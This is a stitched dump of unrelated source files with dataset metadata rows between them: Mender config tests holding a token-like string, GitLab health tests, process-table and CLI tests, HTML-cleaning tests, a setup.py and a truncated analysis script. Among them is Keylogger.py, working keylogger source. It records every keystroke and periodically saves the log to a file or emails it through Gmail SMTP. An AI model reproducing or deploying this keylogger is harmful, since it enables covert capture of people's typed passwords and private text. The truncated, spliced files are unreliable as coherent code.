GNWAxI8A7jyOqKOvY3iemL9TvbKpoIP""",
}
LOCAL_TESTDATA = {
"InventoryPollIntervalSeconds": 100,
"UpdatePollIntervalSeconds": 100,
"RetryPollIntervalSeconds": 100,
}
@pytest.fixture(scope="session", name="local_and_global")
def fixture_local_and_global():
return config.load(
"tests/unit/data/configs/local_mender.conf",
"tests/unit/data/configs/global_medner.conf",
)
@pytest.fixture(scope="session", name="global_only")
def fixture_():
with open("tests/unit/data/configs/global_mender_testdata.conf", "w") as f:
json.dump(GLOBAL_TESTDATA, f)
yield config.load("", "tests/unit/data/configs/global_mender_testdata.conf")
if os.path.isfile("tests/unit/data/configs/global_mender_testdata.conf"):
os.remove("tests/unit/data/configs/global_mender_testdata.conf")
@pytest.fixture(scope="session", name="local_only")
def fixture_local_only():
with open("tests/unit/data/configs/local_mender_testdata.conf", "w") as f:
json.dump(LOCAL_TESTDATA, f)
yield config.load("", "tests/unit/data/configs/local_mender_testdata.conf")
if os.path.isfile("tests/unit/data/configs/local_mender_testdata.conf"):
os.remove("tests/unit/data/configs/local_mender_testdata.conf")
@pytest.fixture(scope="session", name="local_priority")
def fixture_local_priority():
with open("tests/unit/data/configs/local_mender_testdata.conf", "w") as f:
json.dump(LOCAL_TESTDATA, f)
with open("tests/unit/data/configs/global_mender_testdata.conf", "w") as f:
json.dump(GLOBAL_TESTDATA, f)
yield config.load(
"tests/unit/data/configs/local_mender_testdata.conf",
"tests/unit/data/configs/global_mender_testdata.conf",
)
if os.path.isfile("tests/unit/data/configs/global_mender_testdata.conf"):
os.remove("tests/unit/data/configs/global_mender_testdata.conf")
if os.path.isfile("tests/unit/data/configs/local_mender_testdata.conf"):
os.remove("tests/unit/data/configs/local_mender_testdata.conf")
class TestConfigInstance:
def test_both_instance(self, local_and_global):
assert isinstance(local_and_global, config.Config)
def test_glob_instance(self, global_only):
assert isinstance(global_only, config.Config)
def test_local_instance(self, local_only):
assert isinstance(local_only, config.Config)
def test_no_path_instance(self):
with pytest.raises(config.NoConfigurationFileError):
config.load("", "")
class TestLocal:
def test_local_values(self, local_only):
assert local_only.ServerURL == ""
assert local_only.RootfsPartA == ""
assert local_only.RootfsPartB == ""
assert local_only.TenantToken == ""
assert local_only.InventoryPollIntervalSeconds == 100
assert local_only.UpdatePollIntervalSeconds == 100
assert local_only.RetryPollIntervalSeconds == 100
assert local_only.ServerCertificate == ""
class TestGlobal:
def test_no_path(self, global_only):
assert global_only.ServerURL == "https://hosted.mender.io"
assert global_only.RootfsPartA == "/dev/hda2"
assert global_only.RootfsPartB == "/dev/hda3"
assert (
global_only.TenantToken
== """eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJtZW5k
ZXIudGVuYW50IjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4IiwiaXNzIjoiTWVuZ
GVyIiwic3ViIjoiNTllMGIwNzA3ZDZmMGQwMGYwYzFmZTM4In0.uAw2KPrwH6DPT
2ZnDLm4p6lZPlIDbK07QA2I4qcWrLQ7R-WVEuQSx4WmlXYPAgRGU0zeOPiRW-i9_faoY
56tJuLA2-DRMPcoQTn9kieyu8eCB60-gMg10RPa_XCwTAIot8eBjUSPSxjTvFm0pZ3N8
GeBi412EBUw_N2ZVsdto4bhivOZHzJwS5qZoRrCY15_5qa6-9lVbSWVZdzAjoruZKteH
a_KSGtDdg_586QZRzDUXH-kwhItkDJz5LlyiWXpVpk3f4ujX8iwk-u42WBwYbuWN4g
Ti4mNozX4tR_C9OgE-Xf3vmFkIBc_JfJeNUxsp-rPKERDrVxA_sE2l0OVoEZzcquw3c
df2ophsIFIu7scEWavKjZlmEm_VB6vZVfy1NtMkq1xJnrzssJf-eDYti-CJM3E6lSsO
_OmbrDbLa4-bxl8GJjRNH86LX6UOxjgatxaZyKEZhDG-gK6_f57c7MiA0KglOGuA
GNWAxI8A7jyOqKOvY3iemL9TvbKpoIP"""
)
assert global_only.InventoryPollIntervalSeconds == 200
assert global_only.UpdatePollIntervalSeconds == 5
assert global_only.RetryPollIntervalSeconds == 5
assert global_only.ServerCertificate == ""
class TestLocalPriority:
def test_local_priority(self, local_priority):
# Local IventoryPollIntervalSeconds == 100 and Global IventoryPollIntervalSeconds == 200
assert local_priority.InventoryPollIntervalSeconds == 100
def test_with_no_local_server_url(self, local_priority):
# Local serverURL is non existing and Global is https://hosted.mender.io
assert local_priority.ServerURL == "https://hosted.mender.io"
class TestFaultyJSONfile:
def test_both_faulty_json(self):
with open("tests/unit/data/configs/local_mender_faulty.conf", "w") as f:
json.dump(LOCAL_TESTDATA, f)
f.write("this makes the json file faulty")
with open("tests/unit/data/configs/global_mender_faulty.conf", "w") as f:
json.dump(GLOBAL_TESTDATA, f)
f.write("this makes the json file faulty")
with pytest.raises(json.decoder.JSONDecodeError):
config.load(
"tests/unit/data/configs/local_mender_faulty.conf",
"config/global_mender_faulty.conf",
)
os.remove("tests/unit/data/configs/global_mender_faulty.conf")
def test_local_faulty_json(self):
with open("tests/unit/data/configs/local_mender_faulty.conf", "w") as f:
json.dump(LOCAL_TESTDATA, f)
f.write("this makes the json file faulty")
with pytest.raises(json.decoder.JSONDecodeError):
config.load(
"tests/unit/data/configs/local_mender_faulty.conf",
"config/global_mender.conf",
)
os.remove("tests/unit/data/configs/local_mender_faulty.conf")
def test_global_faulty_json(self):
with open("tests/unit/data/configs/global_mender_faulty.conf", "w") as f:
json.dump(GLOBAL_TESTDATA, f)
f.write("this makes the json file faulty")
with pytest.raises(json.decoder.JSONDecodeError):
config.load(
"tests/unit/data/configs/local_mender.conf",
"tests/unit/data/configs/global_mender_faulty.conf",
)
os.remove("tests/unit/data/configs/global_mender_faulty.conf")
class TestFileNotFound:
@pytest.fixture(autouse=True)
def set_log_level(self, caplog):
caplog.set_level(log.DEBUG)
def test_file_not_found_error_both(self, caplog):
with pytest.raises(config.NoConfigurationFileError):
config.load("", "")
assert "Global configuration file: '' not found" in caplog.text
assert "Local configuration file: '' not found" in caplog.text
def test_file_not_found_error_local(self, caplog):
config.load("tests/unit/data/configs/local_mender.conf", "")
assert "Global configuration file: '' not found" in caplog.text
assert "Local configuration file: '' not found" not in caplog.text
def test_file_not_found_error_(self, caplog):
config.load("", "tests/unit/data/configs/global_mender.conf")
assert "Global configuration file: '' not found" not in caplog.text
assert "Local configuration file: '' not found" in caplog.text
| 6,270 | 145 | 518 |
f798fb86638585da8abfe51ba497897f3f2698a1 | 1,761 | py | Python | molecule/https/tests/test_default.py | yabusygin/ansible-role-gitlab | 1a6435865be8c01c301e1a193a72da72817b48fe | [
"MIT"
] | 2 | 2021-05-14T10:31:33.000Z | 2021-05-14T20:42:58.000Z | molecule/https/tests/test_default.py | yabusygin/ansible-role-gitlab | 1a6435865be8c01c301e1a193a72da72817b48fe | [
"MIT"
] | 30 | 2020-02-24T00:20:11.000Z | 2022-03-26T12:02:58.000Z | molecule/https/tests/test_default.py | yabusygin/ansible-role-gitlab | 1a6435865be8c01c301e1a193a72da72817b48fe | [
"MIT"
] | null | null | null | import json
import os
import time
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']
).get_hosts('instance')
| 26.283582 | 63 | 0.55707 | import json
import os
import time
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']
).get_hosts('instance')
def test_health(host):
args = (
"http",
"--ignore-stdin",
"--check-status",
"--body",
"--verify=/etc/ssl/certs/root.crt.pem",
"https://gitlab.test/-/readiness?all=1",
)
retries = 120
while retries > 0:
cmd = host.run(
command=" ".join(args),
)
if cmd.rc == 0:
break
retries -= 1
time.sleep(1)
assert retries > 0
response = json.loads(s=cmd.stdout)
assert response["status"] == "ok"
assert response["cache_check"][0]["status"] == "ok"
assert response["db_check"][0]["status"] == "ok"
assert response["gitaly_check"][0]["status"] == "ok"
assert response["master_check"][0]["status"] == "ok"
assert response["queues_check"][0]["status"] == "ok"
assert response["redis_check"][0]["status"] == "ok"
assert response["shared_state_check"][0]["status"] == "ok"
def test_registry_health(host):
args = (
"http",
"--ignore-stdin",
"--check-status",
"--body",
"--verify=/etc/ssl/certs/root.crt.pem",
"https://gitlab.test:5050/v2/",
)
retries = 120
while retries > 0:
cmd = host.run(
command=" ".join(args),
)
if cmd.rc == 0 or cmd.rc == 4:
break
retries -= 1
time.sleep(1)
assert retries > 0
response = json.loads(s=cmd.stdout)
assert "errors" in response
assert len(response["errors"]) == 1
assert response["errors"][0]["code"] == "UNAUTHORIZED"
| 1,509 | 0 | 46 |
7c398c153c7bb6b6efcc453e6941c3a764c02db1 | 2,336 | py | Python | Keylogger.py | NAVI1237/Python-KeyLogger | 8f302f6539d3a36bf8e94bcba81259ba65ae1d8e | [
"MIT"
] | null | null | null | Keylogger.py | NAVI1237/Python-KeyLogger | 8f302f6539d3a36bf8e94bcba81259ba65ae1d8e | [
"MIT"
] | null | null | null | Keylogger.py | NAVI1237/Python-KeyLogger | 8f302f6539d3a36bf8e94bcba81259ba65ae1d8e | [
"MIT"
] | null | null | null | import keyboard
import smtplib
from threading import Timer
from datetime import date, datetime
SEND_REPORT_EVERY = 60
EMAIL_ADDRESS = ''
EMAIL_PASSWORD = ''
if __name__=="__main__":
keylogger = keylogger(interval=SEND_REPORT_EVERY, report_method="file")
keylogger.start() | 32 | 82 | 0.549229 | import keyboard
import smtplib
from threading import Timer
from datetime import date, datetime
SEND_REPORT_EVERY = 60
EMAIL_ADDRESS = ''
EMAIL_PASSWORD = ''
class keylogger:
def __init__(self, interval, report_method='email'):
self.interval = interval
self.report_method = report_method
self.log = ''
self.start_dt = datetime.now()
self.end_dt = datetime.now()
def callback(self, event):
name = event.name
if len(name) > 1:
if name == 'space':
name = ' '
elif name == 'enter':
name = '[ENTER]\n'
elif name == 'decimal':
name = '.'
else:
name = name.replace(' ', '_')
name = f'[{name.upper()}]'
self.log += name
def update_filename(self):
start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
def report_to_file(self):
with open(f"{self.filename}.txt", "w") as f:
print(self.log, file=f)
print(f"[+] Saved {self.filename}.txt")
def sendmail(self, email, password, message):
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
def report(self):
if self.log:
self.end_dt = datetime.now()
self.update_filename()
if self.report_method == "email":
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
elif self.report_method == "file":
self.report_to_file()
self.start_dt = datetime.now()
self.log = ""
timer = Timer(interval=self.interval, function=self.report)
timer.daemon = True
timer.start()
def start(self):
self.start_dt = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
keyboard.wait()
if __name__=="__main__":
keylogger = keylogger(interval=SEND_REPORT_EVERY, report_method="file")
keylogger.start() | 1,819 | -5 | 230 |
ee381545649b3406cba27450e6dd5232d6b79331 | 2,910 | py | Python | tools/bin/pythonSrc/PSI-0.3b2_gp/tests/processtable_test.py | YangHao666666/hawq | 10cff8350f1ba806c6fec64eb67e0e6f6f24786c | [
"Artistic-1.0-Perl",
"ISC",
"bzip2-1.0.5",
"TCL",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"PostgreSQL",
"BSD-3-Clause"
] | 450 | 2015-09-05T09:12:51.000Z | 2018-08-30T01:45:36.000Z | tools/bin/pythonSrc/PSI-0.3b2_gp/tests/processtable_test.py | YangHao666666/hawq | 10cff8350f1ba806c6fec64eb67e0e6f6f24786c | [
"Artistic-1.0-Perl",
"ISC",
"bzip2-1.0.5",
"TCL",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"PostgreSQL",
"BSD-3-Clause"
] | 1,274 | 2015-09-22T20:06:16.000Z | 2018-08-31T22:14:00.000Z | tools/bin/pythonSrc/PSI-0.3b2_gp/tests/processtable_test.py | YangHao666666/hawq | 10cff8350f1ba806c6fec64eb67e0e6f6f24786c | [
"Artistic-1.0-Perl",
"ISC",
"bzip2-1.0.5",
"TCL",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"PostgreSQL",
"BSD-3-Clause"
] | 278 | 2015-09-21T19:15:06.000Z | 2018-08-31T00:36:51.000Z | # The MIT License
#
# Copyright (C) 2008-2009 Floris Bruynooghe
#
# Copyright (C) 2008-2009 Abilisoft Ltd.
#
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import unittest
import psi
class ProcessAttributeTests(unittest.TestCase):
"""Check the bahaviour of some process attributes
Some process attributes must be present on all processes, these
tests check for this.
"""
if __name__ == '__main__':
unittest.main()
| 31.978022 | 71 | 0.679038 | # The MIT License
#
# Copyright (C) 2008-2009 Floris Bruynooghe
#
# Copyright (C) 2008-2009 Abilisoft Ltd.
#
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import unittest
import psi
class ProcessTableTests(unittest.TestCase):
def setUp(self):
self.archtype = psi.arch.arch_type()
self.pt = psi.process.ProcessTable()
def test_type(self):
self.assert_(isinstance(self.pt, psi.process.ProcessTable))
self.assert_(isinstance(self.pt, dict))
def test_len_nonzero(self):
self.assert_(len(self.pt) > 0)
def test_keys(self):
self.assert_(1 in self.pt)
def test_vals(self):
init = self.pt[1]
self.assert_(isinstance(init, psi.process.Process))
def test_setitem(self):
self.assertRaises(TypeError, self.pt.__setitem__, 123, 'dummy')
def test_delitem(self):
self.assertRaises(TypeError, self.pt.__delitem__, 1)
class ProcessAttributeTests(unittest.TestCase):
"""Check the bahaviour of some process attributes
Some process attributes must be present on all processes, these
tests check for this.
"""
def setUp(self):
self.archtype = psi.arch.arch_type()
def test_name(self):
for p in psi.process.ProcessTable().values():
self.assert_(p.name, str(p))
def test_argc(self):
for p in psi.process.ProcessTable().values():
try:
self.assert_(p.argc >= 0, '%s, argc=%s' % (p, p.argc))
except psi.AttrInsufficientPrivsError:
if isinstance(self.archtype, psi.arch.ArchDarwin):
self.assert_(p.euid != os.geteuid())
else:
raise
def test_command(self):
for p in psi.process.ProcessTable().values():
self.assert_(p.command, str(p))
if __name__ == '__main__':
unittest.main()
| 1,099 | 22 | 322 |
43a5a927474a2097f19c573545a41d741d328775 | 6,151 | py | Python | tests/test_main.py | andyphelps/purgeraw | b074ff0fff06e0e61d6d0423249aee3129d846dc | [
"MIT"
] | null | null | null | tests/test_main.py | andyphelps/purgeraw | b074ff0fff06e0e61d6d0423249aee3129d846dc | [
"MIT"
] | null | null | null | tests/test_main.py | andyphelps/purgeraw | b074ff0fff06e0e61d6d0423249aee3129d846dc | [
"MIT"
] | null | null | null | import os
import tempfile
from contextlib import contextmanager
from typing import Generator, Optional
from unittest.mock import patch, Mock, call
import pytest # type: ignore
from click.testing import CliRunner, Result
import purgeraw.main
from purgeraw.index_extraction import indexer
| 50.00813 | 113 | 0.519915 | import os
import tempfile
from contextlib import contextmanager
from typing import Generator, Optional
from unittest.mock import patch, Mock, call
import pytest # type: ignore
from click.testing import CliRunner, Result
import purgeraw.main
from purgeraw.index_extraction import indexer
class TestMain:
@contextmanager
def make_test_dir(self) -> Generator[str, None, None]:
tempdir: Optional[str] = None
try:
tempdir = tempfile.mkdtemp("_purgeraw")
yield tempdir
finally:
if tempdir is not None:
os.rmdir(tempdir)
@pytest.fixture
def runner(self) -> CliRunner:
return CliRunner()
def test_when_missing_input_dir_then_fails(self, runner: CliRunner) -> None:
result: Result = runner.invoke(purgeraw.main.main, [])
assert result.exit_code == 2
assert "Error: Missing argument '<directory>'." in result.output
def test_when_input_dir_not_exists_then_fails(self, runner: CliRunner) -> None:
result: Result = runner.invoke(purgeraw.main.main, ["/flibble1212"])
assert result.exit_code == 2
assert "Path '/flibble1212' does not exist." in result.output
@patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
@patch.object(purgeraw.main, purgeraw.main.purge.__name__)
@patch.object(purgeraw.main, purgeraw.main.fake_deleter.__name__)
def test_when_input_dir_present_then_walker_purger_and_fake_deleter_called(self,
deleter_mock: Mock,
purger_mock: Mock,
walker_mock: Mock,
runner: CliRunner) -> None:
walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
dirname: str
with self.make_test_dir() as dirname:
result: Result = runner.invoke(purgeraw.main.main, [dirname])
assert result.exit_code == 0
assert walker_mock.call_args_list == [call(["cr3", "xmp", "jpg"]),
call(dirname)
]
assert purger_mock.call_args_list == [call(["cr3", "xmp"], indexer),
call(["/some/dir/fred.cr3"])
]
assert deleter_mock.call_args.args[0] == ["/some/dir/fred.cr3"]
@patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
@patch.object(purgeraw.main, purgeraw.main.purge.__name__)
@patch.object(purgeraw.main, purgeraw.main.deleter.__name__)
def test_when_input_dir_present_with_delete_then_walker_purger_and_deleter_called(self,
deleter_mock: Mock,
purger_mock: Mock,
walker_mock: Mock,
runner: CliRunner) -> None:
walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
dirname: str
with self.make_test_dir() as dirname:
result: Result = runner.invoke(purgeraw.main.main, [dirname, "-d"])
assert result.exit_code == 0
assert walker_mock.call_args_list == [call(["cr3", "xmp", "jpg"]),
call(dirname)
]
assert purger_mock.call_args_list == [call(["cr3", "xmp"], indexer),
call(["/some/dir/fred.cr3"])
]
assert deleter_mock.call_args.args[0] == ["/some/dir/fred.cr3"]
@patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
@patch.object(purgeraw.main, purgeraw.main.purge.__name__)
def test_when_input_dir_present_with_raw_extensions_then_purge_called(self,
purger_mock: Mock,
walker_mock: Mock,
runner: CliRunner) -> None:
walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
dirname: str
with self.make_test_dir() as dirname:
result: Result = runner.invoke(purgeraw.main.main, [dirname, "-r", "cr2", "-r", "raw"])
assert result.exit_code == 0
assert walker_mock.call_args_list[0] == call(["cr2", "raw", "jpg"])
assert purger_mock.call_args_list[0] == call(["cr2", "raw"], indexer)
@patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
@patch.object(purgeraw.main, purgeraw.main.purge.__name__)
def test_when_input_dir_present_with_processed_extensions_then_purge_called(self,
purger_mock: Mock,
walker_mock: Mock,
runner: CliRunner) -> None:
walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
dirname: str
with self.make_test_dir() as dirname:
result: Result = runner.invoke(purgeraw.main.main, [dirname, "-p", "png"])
assert result.exit_code == 0
assert walker_mock.call_args_list[0] == call(["cr3", "xmp", "png"])
| 4,904 | 933 | 23 |
ffd51ee16a4b7917c17a095b3963c892847c77b5 | 4,564 | py | Python | tests/unit_tests/test_clean_html.py | JobtechSwe/elastic-importers | ae370984f79295a784350f98e695977a1f73647a | [
"Apache-2.0"
] | 2 | 2020-03-02T18:29:08.000Z | 2021-06-09T00:48:24.000Z | tests/unit_tests/test_clean_html.py | JobtechSwe/elastic-importers | ae370984f79295a784350f98e695977a1f73647a | [
"Apache-2.0"
] | 12 | 2019-01-31T09:54:23.000Z | 2021-10-04T11:25:44.000Z | tests/unit_tests/test_clean_html.py | JobtechSwe/elastic-importers | ae370984f79295a784350f98e695977a1f73647a | [
"Apache-2.0"
] | 1 | 2018-11-09T14:44:55.000Z | 2018-11-09T14:44:55.000Z | import pytest
import json
import os
import logging
from importers.common.helpers import clean_html
log = logging.getLogger(__name__)
current_dir = os.path.dirname(os.path.realpath(__file__)) + '/'
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
| 35.107692 | 203 | 0.724145 | import pytest
import json
import os
import logging
from importers.common.helpers import clean_html
log = logging.getLogger(__name__)
current_dir = os.path.dirname(os.path.realpath(__file__)) + '/'
@pytest.mark.unit
def test_clean_html_non_html():
input = 'En mening utan html fast med radbrytning\nAndra raden kommer här'
output = clean_html(input)
assert (input == output)
@pytest.mark.unit
def test_clean_html_br():
output = clean_html('<b>Rubrik</b>Rad 1<br />Rad 2')
assert 'RubrikRad 1\nRad 2' == output
@pytest.mark.unit
def test_clean_html_p_tags():
output = clean_html('<p>Paragraf 1</p><p>Paragraf 2</p>')
assert 'Paragraf 1\n\nParagraf 2' == output
@pytest.mark.unit
def test_clean_html_nested_p_tags():
output = clean_html('<p>Paragraf 1<p>Nästlad paragraf</p>Och fortsättning paragraf 1</p><p>Paragraf 2</p>')
assert 'Paragraf 1\nNästlad paragraf\nOch fortsättning paragraf 1\nParagraf 2' == output
@pytest.mark.unit
def test_clean_html_ul_and_li_tags():
output = clean_html(
'<p><strong>DIN ROLL:</strong></p><ul><li>Helhetsansvar för implementationsprocessen.</li><li>Planläggning och projektledning.</li><li>Analys och migrering av kundens data.</li></ul>Efter lista')
expected_output = 'DIN ROLL:\nHelhetsansvar för implementationsprocessen.\nPlanläggning och projektledning.\nAnalys och migrering av kundens data.\nEfter lista'
assert expected_output == output
@pytest.mark.unit
def test_clean_html_headlines():
for i in range(1, 7):
input = '<h%s>Rubrik</h%s>Brödtext här' % (i, i)
output = clean_html(input)
assert ('Rubrik\nBrödtext här' == output)
@pytest.mark.unit
def test_clean_non_valid_html():
assert 'Paragraf 1 utan sluttag.' == clean_html('<p>Paragraf 1 utan sluttag.')
assert 'Paragraf 1 utan starttag.' == clean_html('Paragraf 1 utan starttag.</p>')
assert 'brtag som inte är\nxhtml' == clean_html('brtag som inte är<br>xhtml')
assert 'Helt fel rubrik' == clean_html('<h1>Helt fel rubrik</h2>')
assert 'Eget attribut' == clean_html('<h1 hittepå="test">Eget attribut</h1>')
@pytest.mark.unit
def test_clean_script_tags():
assert '' == clean_html('<script>alert("test");</script>')
assert 'Lite text. Lite till. Och lite till.' == clean_html(
'<script>alert("test");</script>Lite text. Lite till. <script>alert("test");</script>Och lite till.')
@pytest.mark.unit
def test_clean_html_from_description():
source_ads = get_source_ads_from_file()
annons_id = '23483261'
source_ad = get_source_ad(annons_id, source_ads)
ad_html_text = source_ad['annonstextFormaterad']
cleaned_ad_text = clean_html(ad_html_text)
assert '</p>' not in cleaned_ad_text
assert '\n' in cleaned_ad_text
@pytest.mark.unit
def test_clean_html_from_description2():
source_ads = get_source_ads_from_file()
annons_id = '8428019'
source_ad = get_source_ad(annons_id, source_ads)
ad_html_text = source_ad['annonstextFormaterad']
cleaned_ad_text = clean_html(ad_html_text)
assert '</p>' not in cleaned_ad_text
assert '\n' in cleaned_ad_text
@pytest.mark.unit
def test_clean_html_type_none_input():
cleaned_ad_text = clean_html(None)
assert cleaned_ad_text == ''
@pytest.mark.unit
def test_clean_html_p_tags():
input = '<b>Dina arbetsuppgifter</b><p>Du kommer att undervisa inom ämnet trädgård.'
expected_output = 'Dina arbetsuppgifter\nDu kommer att undervisa inom ämnet trädgård.'
assert clean_html(input) == expected_output
@pytest.mark.unit
def test_clean_html_p_tags_no_previous_sibling():
input = 'Dina arbetsuppgifter<p>Du kommer att undervisa inom ämnet trädgård.'
expected_output = 'Dina arbetsuppgifter\nDu kommer att undervisa inom ämnet trädgård.'
assert clean_html(input) == expected_output
@pytest.mark.unit
def test_clean_html_double_p_tags():
input = '<p><b>Dina arbetsuppgifter</b></p><p>Du kommer att undervisa inom ämnet trädgård.'
expected_output = 'Dina arbetsuppgifter\nDu kommer att undervisa inom ämnet trädgård.'
assert clean_html(input) == expected_output
def get_source_ads_from_file():
with open(current_dir + 'test_resources/platsannonser_source_test_import.json', encoding='utf-8') as f:
result = json.load(f)
return result['testannonser']
def get_source_ad(annons_id, ads):
ads_with_id = [ad for ad in ads if str(ad['annonsId']) == str(annons_id)]
ad = None if len(ads_with_id) == 0 else ads_with_id[0]
ad['annonsId'] = str(ad['annonsId'])
return ad
| 3,764 | 0 | 354 |
09e85066997bff1c93ece7e7feecfb52d5157f6c | 1,216 | py | Python | setup.py | rafaelravedutti/pairs | 7023107ec4e2a3a6a2a3c21f4114e8178d61ca88 | [
"MIT"
] | null | null | null | setup.py | rafaelravedutti/pairs | 7023107ec4e2a3a6a2a3c21f4114e8178d61ca88 | [
"MIT"
] | null | null | null | setup.py | rafaelravedutti/pairs | 7023107ec4e2a3a6a2a3c21f4114e8178d61ca88 | [
"MIT"
] | null | null | null | import setuptools
modules = [
'code_gen',
'coupling',
'graph',
'ir',
'mapping',
'sim',
'transformations',
]
setuptools.setup(name='pairs',
description="A code generator for particle simulations",
version="0.0.1",
long_description=readme(),
long_description_content_type="text/markdown",
author="Rafael Ravedutti Lucio Machado",
license='MIT',
author_email="rafael.r.ravedutti@fau.de",
url="https://github.com/rafaelravedutti/pairs",
install_requires=[],
packages=['pairs'] + [f"pairs.{mod}" for mod in modules],
package_dir={'pairs': 'src/pairs'},
package_data={'pairs': ['runtime/*.hpp']},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
project_urls={
"Bug Tracker": "https://github.com/rafaelravedutti/pairs",
"Documentation": "https://github.com/rafaelravedutti/pairs",
"Source Code": "https://github.com/rafaelravedutti/pairs",
},
extras_require={},
tests_require=[],
python_requires=">=3.6",
)
| 26.434783 | 68 | 0.620888 | import setuptools
def readme():
with open('README.md') as f:
return f.read()
modules = [
'code_gen',
'coupling',
'graph',
'ir',
'mapping',
'sim',
'transformations',
]
setuptools.setup(name='pairs',
description="A code generator for particle simulations",
version="0.0.1",
long_description=readme(),
long_description_content_type="text/markdown",
author="Rafael Ravedutti Lucio Machado",
license='MIT',
author_email="rafael.r.ravedutti@fau.de",
url="https://github.com/rafaelravedutti/pairs",
install_requires=[],
packages=['pairs'] + [f"pairs.{mod}" for mod in modules],
package_dir={'pairs': 'src/pairs'},
package_data={'pairs': ['runtime/*.hpp']},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
project_urls={
"Bug Tracker": "https://github.com/rafaelravedutti/pairs",
"Documentation": "https://github.com/rafaelravedutti/pairs",
"Source Code": "https://github.com/rafaelravedutti/pairs",
},
extras_require={},
tests_require=[],
python_requires=">=3.6",
)
| 49 | 0 | 23 |
5e89149ca60c750392ee70c05aab89a6d8044f25 | 1,161 | py | Python | examples/NAMD/analysis/nacl_analysis/datafiles/milestoning_analysis.py | dhimanray/WEMRR | aab019f1d1bb4d6db6dea36f9444167591129322 | [
"BSD-3-Clause"
] | null | null | null | examples/NAMD/analysis/nacl_analysis/datafiles/milestoning_analysis.py | dhimanray/WEMRR | aab019f1d1bb4d6db6dea36f9444167591129322 | [
"BSD-3-Clause"
] | null | null | null | examples/NAMD/analysis/nacl_analysis/datafiles/milestoning_analysis.py | dhimanray/WEMRR | aab019f1d1bb4d6db6dea36f9444167591129322 | [
"BSD-3-Clause"
] | null | null | null | #THIS CODE IS AN EXAMPLE HOW TO COMPUTE VARIOUS PROPERTIES
import numpy as np
import wemrr
milestones = [2.45,2.7,3.5,4.5,5.5,7.0,9.0]
#==================================================
#Compute steady state K and mean first passage time
#===================================================
K,t,Nhit = wemrr.compute_kernel(milestones)
#MFPT from r=2.7 to r=7.0
print(wemrr.MFPT(K,t,1,5))
#==================================================
#Compute equilibrium K and free energy profile
#===================================================
